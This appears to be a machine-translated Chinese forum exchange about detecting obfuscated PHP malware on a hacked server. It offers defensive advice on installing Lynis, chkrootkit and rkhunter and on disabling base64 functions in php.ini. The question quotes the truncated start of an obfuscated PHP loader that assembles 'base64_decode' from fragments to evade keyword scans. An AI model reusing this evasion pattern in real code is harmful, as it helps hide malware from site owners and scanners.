[调查黑客时,有时会看到包含类似内容的文件
<?php $_f__db='base'.(128/2).'_de'.'code';$_f__db=$_f__db(str_replace("\n", '',
'NrFujw3uBxuQgdlYFMmhRT5V9BI7aFnbviWhPbszFd2E/c3ZpFcl++i/D7YTZS/SS/UmjeX5iUwPas6c
lSM+lWVedpU7QjEjf4CDapQAkqXpaTvaQ3g247sz4HjqGhV71TFRk69+EctaM7tmymteKtT9OSwsSBmp
我很想扫描“ base64_decode”,但是坏家伙对此感到困惑-关于检测这种事情有什么想法吗?
您可以将扫描仪用于Lynis等
# cd /opt/
# wget https://downloads.cisofy.com/lynis/lynis-2.6.6.tar.gz
# tar xvzf lynis-2.6.6.tar.gz
# mv lynis /usr/local/
# ln -s /usr/local/lynis/lynis /usr/local/bin/lynis
然后使用
lynis audit system
扫描服务器
您也可以使用chkrootkit
# yum update
# yum install wget gcc-c++ glibc-static
# wget -c ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
# tar –xzf chkrootkit.tar.gz
# mkdir /usr/local/chkrootkit
# mv chkrootkit-0.52/* /usr/local/chkrootkit
# cd /usr/local/chkrootkit
# make sense
然后您执行此操作以开始扫描
sudo chkrootkit
Rkhunter可能也值得一提
# yum install epel-release
# yum install rkhunter
然后
rkhunter -c
扫描
[还有其他类似ClamAV和LMD的工具,但以上任何一种方法都可以找到大多数病毒。但是,没有什么能吸引人的眼球;-)密切注意服务器进程和新添加的文件是一种好习惯。如果您不需要base64,则可以始终将其作为阻塞函数添加到PHP.ini中。